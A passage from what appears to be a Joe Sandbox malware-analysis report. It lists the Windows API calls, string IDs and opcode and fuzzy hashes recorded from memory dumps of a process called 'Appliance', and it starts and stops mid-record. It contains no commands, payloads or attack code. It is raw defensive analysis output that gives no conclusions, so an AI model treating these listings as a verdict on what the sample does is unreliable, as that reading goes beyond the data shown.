                                                                                                                                              • Part of subcall function 00E2E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E2D7CD,?), ref: 00E2E714
                                                                                                                                              • Part of subcall function 00E2E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E2D7CD,?), ref: 00E2E72D
                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00E2D7F0
                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00E2D82A
                                                                                                                                            • _wcslen.LIBCMT ref: 00E2D8B0
                                                                                                                                            • _wcslen.LIBCMT ref: 00E2D8C6
                                                                                                                                            • SHFileOperationW.SHELL32(?), ref: 00E2D90C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                            • String ID: \*.*
                                                                                                                                            • API String ID: 3164238972-1173974218
                                                                                                                                            • Opcode ID: 77e81b1db5f9c357432bba3eb24e58d8ea167a02ec89c8ee4988bea6eb2bd383
                                                                                                                                            • Instruction ID: 97b2c628f781cb3b370d178227f4b529803023aa1024a1408915c0e49d540370
                                                                                                                                            • Opcode Fuzzy Hash: 77e81b1db5f9c357432bba3eb24e58d8ea167a02ec89c8ee4988bea6eb2bd383
                                                                                                                                            • Instruction Fuzzy Hash: 814158719092289EDF16EBA4DD85BDD77F8AF14340F1114EAA605F7141EB34A788CB50
                                                                                                                                            APIs
                                                                                                                                            • GetInputState.USER32 ref: 00E34310
                                                                                                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00E34367
                                                                                                                                            • TranslateMessage.USER32(?), ref: 00E34390
                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00E3439A
                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E343AB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                            • String ID: (
                                                                                                                                            • API String ID: 2256411358-2063206799
                                                                                                                                            • Opcode ID: 31d7e5c27fab242bfd965b897934014e61366d5ee16a060c381886dbefbcd5d5
                                                                                                                                            • Instruction ID: aa976533f7cf062c465caec0d13a59f7b8b0e3cbaaffbe1e10e43c64d152e303
                                                                                                                                            • Opcode Fuzzy Hash: 31d7e5c27fab242bfd965b897934014e61366d5ee16a060c381886dbefbcd5d5
                                                                                                                                            • Instruction Fuzzy Hash: 3F3180B0504346EEEB39DB75D84DBB67FA8AB01309F04156ED562B31E0E365B889CB21
                                                                                                                                            APIs
                                                                                                                                            • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00E538B8
                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00E538EB
                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00E53920
                                                                                                                                            • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00E53952
                                                                                                                                            • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00E5397C
                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00E5398D
                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E539A7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LongWindow$MessageSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2178440468-0
                                                                                                                                            • Opcode ID: 53d6a3e77ba0f0da6962b6c898b15beed616842a6f138c4297f58ba2ce5764e2
                                                                                                                                            • Instruction ID: 7bc171304c9a73f73c2f4498a21b503dd9c6fa4fede5b99145f421efa0e8061f
                                                                                                                                            • Opcode Fuzzy Hash: 53d6a3e77ba0f0da6962b6c898b15beed616842a6f138c4297f58ba2ce5764e2
                                                                                                                                            • Instruction Fuzzy Hash: DE315974608241AFDB29CF69DC84F6837A0FB8A356F142565FA00AB2B5C7B0A94CCB01
                                                                                                                                            APIs
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E280D0
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E280F6
                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00E280F9
                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00E28117
                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00E28120
                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00E28145
                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00E28153
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                            • Opcode ID: 2dfcd697cd7a671816dd7902312ec342e80d65615774ed9c01133989c48408fb
                                                                                                                                            • Instruction ID: cf039506c55f1574973e7df970090fab81479670cc673ef9a56b2343fa501b9a
                                                                                                                                            • Opcode Fuzzy Hash: 2dfcd697cd7a671816dd7902312ec342e80d65615774ed9c01133989c48408fb
                                                                                                                                            • Instruction Fuzzy Hash: EA21B872606229AFDF14DFA9DC84CBB77ACEB093647048425F915EB2D0DA74DC46C760
                                                                                                                                            APIs
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E281A9
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E281CF
                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00E281D2
                                                                                                                                            • SysAllocString.OLEAUT32 ref: 00E281F3
                                                                                                                                            • SysFreeString.OLEAUT32 ref: 00E281FC
                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00E28216
                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00E28224
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                            • Opcode ID: e9e1ba38434d772681ab1cfa8c7602511419507d60942c32c614e0bd9c17eee2
                                                                                                                                            • Instruction ID: 136b1a88c88529b4451b0bc4d2f874cd53a398cf8816fc27465ed4eb2d0bf3cc
                                                                                                                                            • Opcode Fuzzy Hash: e9e1ba38434d772681ab1cfa8c7602511419507d60942c32c614e0bd9c17eee2
                                                                                                                                            • Instruction Fuzzy Hash: 7621C832605214BFDB14EFB9FC89DAA77ECEB093647048125F915EB1A0DA70EC41C764
                                                                                                                                            APIs
                                                                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00E30E99
                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E30ED5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateHandlePipe
                                                                                                                                            • String ID: nul
                                                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                                                            • Opcode ID: 3db2f16fa85bf8791feffaa9702b9ab986a58a5713cbe7794d799f0e19ca4fbb
                                                                                                                                            • Instruction ID: 5f7f9ed46949aa599b24cd9d653fe36e44a4dc84b9338d8fedda0edfba871ea3
                                                                                                                                            • Opcode Fuzzy Hash: 3db2f16fa85bf8791feffaa9702b9ab986a58a5713cbe7794d799f0e19ca4fbb
                                                                                                                                            • Instruction Fuzzy Hash: E9216B7460430AAFDB309F29DC18A9A7BE8BF54724F204A59FCA5F72E0D770A840CB50
                                                                                                                                            APIs
                                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00E30F6D
                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E30FA8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateHandlePipe
                                                                                                                                            • String ID: nul
                                                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                                                            • Opcode ID: 06c67531e6ce006997679e016c2e91f04808fa58551cc6c643e27e53a76f8241
                                                                                                                                            • Instruction ID: 7bae1b3d966f892c5114f572de01e0e8877f4713b7264a90da5bfeb614b31020
                                                                                                                                            • Opcode Fuzzy Hash: 06c67531e6ce006997679e016c2e91f04808fa58551cc6c643e27e53a76f8241
                                                                                                                                            • Instruction Fuzzy Hash: CF21B0356043059FDB349F698C08A9A7BE8BF55728F201A6DF8A1F32E0DB70D880DB50
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DC78B1
                                                                                                                                              • Part of subcall function 00DC7873: GetStockObject.GDI32(00000011), ref: 00DC78C5
                                                                                                                                              • Part of subcall function 00DC7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DC78CF
                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E54BB0
                                                                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E54BBD
                                                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E54BC8
                                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E54BD7
                                                                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E54BE3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                            • String ID: Msctls_Progress32
                                                                                                                                            • API String ID: 1025951953-3636473452
                                                                                                                                            • Opcode ID: b6e9d63f618e6e818327779ea1916cbd189bc1888acccd0e11cae1c378ba58d8
                                                                                                                                            • Instruction ID: efce7a1d449cd63a14debb30dda2512aa2820ead41de29ae6471e94e8f577769
                                                                                                                                            • Opcode Fuzzy Hash: b6e9d63f618e6e818327779ea1916cbd189bc1888acccd0e11cae1c378ba58d8
                                                                                                                                            • Instruction Fuzzy Hash: 811193B2550219BEEF119E65CC85EE77FADEF08758F015111BA08A2090CA71DC659BA0
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DFDB23: _free.LIBCMT ref: 00DFDB4C
                                                                                                                                            • _free.LIBCMT ref: 00DFDBAD
                                                                                                                                              • Part of subcall function 00DF2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00DFDB51,00E91DC4,00000000,00E91DC4,00000000,?,00DFDB78,00E91DC4,00000007,00E91DC4,?,00DFDF75,00E91DC4), ref: 00DF2D4E
                                                                                                                                              • Part of subcall function 00DF2D38: GetLastError.KERNEL32(00E91DC4,?,00DFDB51,00E91DC4,00000000,00E91DC4,00000000,?,00DFDB78,00E91DC4,00000007,00E91DC4,?,00DFDF75,00E91DC4,00E91DC4), ref: 00DF2D60
                                                                                                                                            • _free.LIBCMT ref: 00DFDBB8
                                                                                                                                            • _free.LIBCMT ref: 00DFDBC3
                                                                                                                                            • _free.LIBCMT ref: 00DFDC17
                                                                                                                                            • _free.LIBCMT ref: 00DFDC22
                                                                                                                                            • _free.LIBCMT ref: 00DFDC2D
                                                                                                                                            • _free.LIBCMT ref: 00DFDC38
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                            • Instruction ID: 26cfbccdfbd7c3191d47064e5ca4aa48f12ed25c94c6a32c07c6dfd147a0cbfc
                                                                                                                                            • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                            • Instruction Fuzzy Hash: 7911907254170CA6D521BF70CC07FEB77EEDF04301F428C58B7A9AA152C625BA404770
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memcmp
                                                                                                                                            • String ID: j`
                                                                                                                                            • API String ID: 2931989736-1521845545
                                                                                                                                            • Opcode ID: c8e2b5aa021f9047d7dfe0ff578116f5701035802969f4711a5bacbd0ec857a3
                                                                                                                                            • Instruction ID: 411991bd3b6be18dbf87e7437bb77d3c513e5e18b5f892a7ca5e1be4c83f991d
                                                                                                                                            • Opcode Fuzzy Hash: c8e2b5aa021f9047d7dfe0ff578116f5701035802969f4711a5bacbd0ec857a3
                                                                                                                                            • Instruction Fuzzy Hash: EE019EB6741326BBD6207621BC82EAB735DEE50B9CB005121FE0ABA241E771ED50D2B1
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E2E328
                                                                                                                                            • LoadStringW.USER32(00000000), ref: 00E2E32F
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E2E345
                                                                                                                                            • LoadStringW.USER32(00000000), ref: 00E2E34C
                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E2E390
                                                                                                                                            Strings
                                                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00E2E36D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleLoadModuleString$Message
                                                                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                            • API String ID: 4072794657-3128320259
                                                                                                                                            • Opcode ID: 0c0e23016a091a31946f148220c7428284d406d205f79fcb7cb9a111aa79c9d9
                                                                                                                                            • Instruction ID: 4db3954c314141a40b3b92f88988e88ff0f6f05fb3e88c003a8541ac404456cb
                                                                                                                                            • Opcode Fuzzy Hash: 0c0e23016a091a31946f148220c7428284d406d205f79fcb7cb9a111aa79c9d9
                                                                                                                                            • Instruction Fuzzy Hash: 860186F2904318BFE721A7A49D89EE7776CD708302F004991B749F6041EA749E894B71
                                                                                                                                            APIs
                                                                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00E31322
                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,?), ref: 00E31334
                                                                                                                                            • TerminateThread.KERNEL32(00000000,000001F6), ref: 00E31342
                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00E31350
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00E3135F
                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E3136F
                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 00E31376
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3495660284-0
                                                                                                                                            • Opcode ID: 35684373630c41bf1a3e27eaf190778775a2876a76901e4fb14f13bb6b337b2f
                                                                                                                                            • Instruction ID: d88fadcee0e387c6b95805970f6f5f28675148bc98ecc2bad33965734a3c96d9
                                                                                                                                            • Opcode Fuzzy Hash: 35684373630c41bf1a3e27eaf190778775a2876a76901e4fb14f13bb6b337b2f
                                                                                                                                            • Instruction Fuzzy Hash: 86F0C932046B12AFD7651B55EE8DBD6BB39BF04306F402525F101E5CB08B7594B9CF91
                                                                                                                                            APIs
                                                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00E4281D
                                                                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00E4283E
                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00E4284F
                                                                                                                                            • htons.WSOCK32(?,?,?,?,?), ref: 00E42938
                                                                                                                                            • inet_ntoa.WSOCK32(?), ref: 00E428E9
                                                                                                                                              • Part of subcall function 00E2433E: _strlen.LIBCMT ref: 00E24348
                                                                                                                                              • Part of subcall function 00E43C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00E3F669), ref: 00E43C9D
                                                                                                                                            • _strlen.LIBCMT ref: 00E42992
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3203458085-0
                                                                                                                                            • Opcode ID: cbca9dc4a6d99ca2ceb5a86e0b0bf3eb0792e86250f2e7d2da235d6a74fa712a
                                                                                                                                            • Instruction ID: 2b6cac6b1c336d09fe0d077138a0d553400c452b923e576f31b476936e0bb1f7
                                                                                                                                            • Opcode Fuzzy Hash: cbca9dc4a6d99ca2ceb5a86e0b0bf3eb0792e86250f2e7d2da235d6a74fa712a
                                                                                                                                            • Instruction Fuzzy Hash: BCB10431604301AFD324DF24D885F2ABBE5EF84318F94954CF5566B2A2DB31ED45CBA1
                                                                                                                                            APIs
                                                                                                                                            • __allrem.LIBCMT ref: 00DF042A
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF0446
                                                                                                                                            • __allrem.LIBCMT ref: 00DF045D
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF047B
                                                                                                                                            • __allrem.LIBCMT ref: 00DF0492
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF04B0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
